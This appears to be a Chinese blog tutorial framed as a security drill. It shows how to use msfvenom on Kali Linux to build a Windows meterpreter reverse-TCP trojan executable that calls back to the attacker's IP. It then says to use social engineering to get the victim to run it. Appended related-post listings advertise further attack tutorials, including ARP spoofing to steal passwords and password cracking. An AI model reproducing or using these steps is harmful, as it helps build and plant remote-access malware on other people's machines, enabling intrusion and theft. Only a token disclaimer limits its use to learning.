一、课前声明
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络技术干货!

二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。

三、战略安排
3.1 将受害者主机(Windows7)跟主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。

3.2 利用kali linux的相关工具(msfvenom)生成对应的木码文件,如下图所示。

步骤1:msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload荷载。也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置。
-h, –help 查看帮助选项。
步骤2:msfvenom工具生成对应的木码文件举例,如下图所示。

步骤3:查看Kali Linux主机的主机IP地址,如下图所示。
命令:ifconfig

步骤4:利用msfvenom工具生成对应的木码文件,如下图所示。
命令:msfvenom -p 指定需要使用的payload载荷 lhost=Kali主机IP -f exe -o 生成木码文件的保存位置
例子:msfVenom -p windows/meterpreter/reverse_tcplhost=192.168.78.144 -f exe -o /root/hk.exe

步骤5:msfvenom工具生成木码文件对应的命令运行结果如下图所示。
Saved as:生成的木码文件保存路径。

步骤6:在已知的木码文件保存路径目录下查找对应的木码文件是否已经生成,如下图所示,木码文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木码文件)。

3.3 利用一定的社会工程学方法将生成的木码文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解)

辛苦原创,关注我,私信我,欢迎与我学习交流!

网络安全与网站安全及计算机安全:如何使用Kali Linux进行Windows计算机操作系统安全演练相关推荐

  1. 网络安全与网站安全及计算机安全:如何使用Kali Linux进行内网或局域网安全演练?

    本节课你将了解到如何使用ARP欺骗窃取局域网用户相关账户密玛,内容包括: 1.如何开启IP转发 2.怎样窃取受害用户相关账号密玛 一.如何开启IP转发 在之前的截取受害者电脑图片流量的课程中,我们也讲 ...

  2. 白帽子黑客与网络安全工程师教你:Kali Linux和Windows软件管理的异同【一】

    课前声明: 1.本分享仅做学习交流,请自觉遵守法律法规! 2.搜索:Kali 与编程,学习更多网络攻防干货! 3.Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一.背景介绍 我们大多数人平 ...

  3. kali linux 软件管理_白帽子***与网络安全工程师教你:Kali Linux和Windows软件管理的异同【二】...

    课前声明: 1.本分享仅做学习交流,请自觉遵守法律法规! 2.搜索:Kali 与编程,学习更多网络***干货! 3.Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一.背景介绍 我们大多数人 ...

  4. 网络安全与网站安全及计算机安全:如何使用Kali Linux的Rarcrack获取RAR压缩文件加密密码?

    知识点详解 1.1.Rarcrack是一款获取压缩文件密吗的软件,但是仅支持zip.rar和7z三种类型. 1.2.在kali操作系统中是没有此工具的,所以就必须先安装才能使用. 1.3.安装Rarc ...

  5. 网络安全与网站安全及计算机安全:如何利用Kali Linux的MSF进行MS10-046安全演练

    一.资源装备 安装好Kali Linux的虚拟机一台: Windows xp 计算机一台. 整装待发的小白一个. 二.复现步骤 2.1 在kali中启动MSF. 打开终端 键入命令:msfconsol ...

  6. 网络安全与网站安全及计算机安全:如何使用Kali Linux的MSF进行MS12-020安全演练

    一.资源装备 安装好Kali Linux的虚拟机一台: Windows xp 计算机一台. 二.安全演练 2.1 在kali中启动MSF. 打开终端 键入命令:msfconsole 2.2 配置相关参 ...

  7. 网络安全与网站安全及计算机安全:如何使用Kali Linux进行MS08-067安全演练

    一.资源装备 安装好Kali Linux的虚拟机一台: Windows xp 计算机一台. 二.安全演练 2.1 在kali中启动MSF. 打开终端 键入命令:msfconsole 2.2 配置相关参 ...

  8. 网络安全与网站安全及计算机安全:Kali Linux网络安全与主机扫描背后的“秘密”

    Kali的精髓在于安全测试,测试必须要有目标,主机扫描和发现就是要找到目标,以便有的放矢,精准打击,今天我们对照"七宝玲珑塔"来认识一下kali自带的几个主机发现的工具. 一.二层 ...

  9. linux网站渗透工具包,ubuntu下安装 kali linux 渗透工具包

    相信用过linux系统的盆友都听说过kali linux 它是一个非常好的用于渗透测试的Linux发行版.但是如何在ubuntu下使用kali linux 的渗透工具嘞!LionSec开发出了一个py ...

最新文章

  1. NLP模型BERT和经典数据集!
  2. 【LeetCode 剑指offer刷题】树题6:28 对称二叉树(101. Symmetric Tree)
  3. mount cifs出现cannot allocate memory解决方法
  4. IOS小技巧–用runtime 解决UIButton 重复点击问题
  5. 机器人学习--有参考意义的视频
  6. Java 线程同步总结
  7. 【渝粤题库】陕西师范大学700011 新课程改革与生物教材研究
  8. 架构日趋复杂的今天,如何重构数据库和应用边界?
  9. iptv直播源m3u_Padavan 单线复用实现拨号上网加IPTV 操作记录
  10. opencv之绘制多边形----cv2.polylines, cv2.fillPoly
  11. 超过父控件的部分不能响应事件怎么办
  12. Linux内存分配小结--malloc、brk、mmap【转】
  13. es6兼容性问题解决
  14. 我要换博客啦~Github+Hexo~Windows版本
  15. 带你了解微信代运营公众号到底怎么做
  16. JMeter基础系列:接口响应时间
  17. 年度回顾:2021年区块链安全问题建议
  18. 路由器攻击java,局域网中ARP攻击和浏览器挟持的解决方法
  19. 微信小程序---配置普通链接二维码规则
  20. Android Qcom Display学习(四)

热门文章

  1. 万里长征第一步----学会做科研
  2. 给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。
  3. 中国地理信息产业人才分布地图
  4. 微信小程序 云数据库使用(上)
  5. 关于学习ArcGis的相关阅读书目的推荐
  6. t-learning 产品经理课程笔记
  7. conda环境名称消失问题
  8. datax值转换使用以及源码分析
  9. SLAM本质剖析番外-李群李代数的微分和导数
  10. BCG 使用之CBCGPTabWnd控件(相当于MFC TabControl)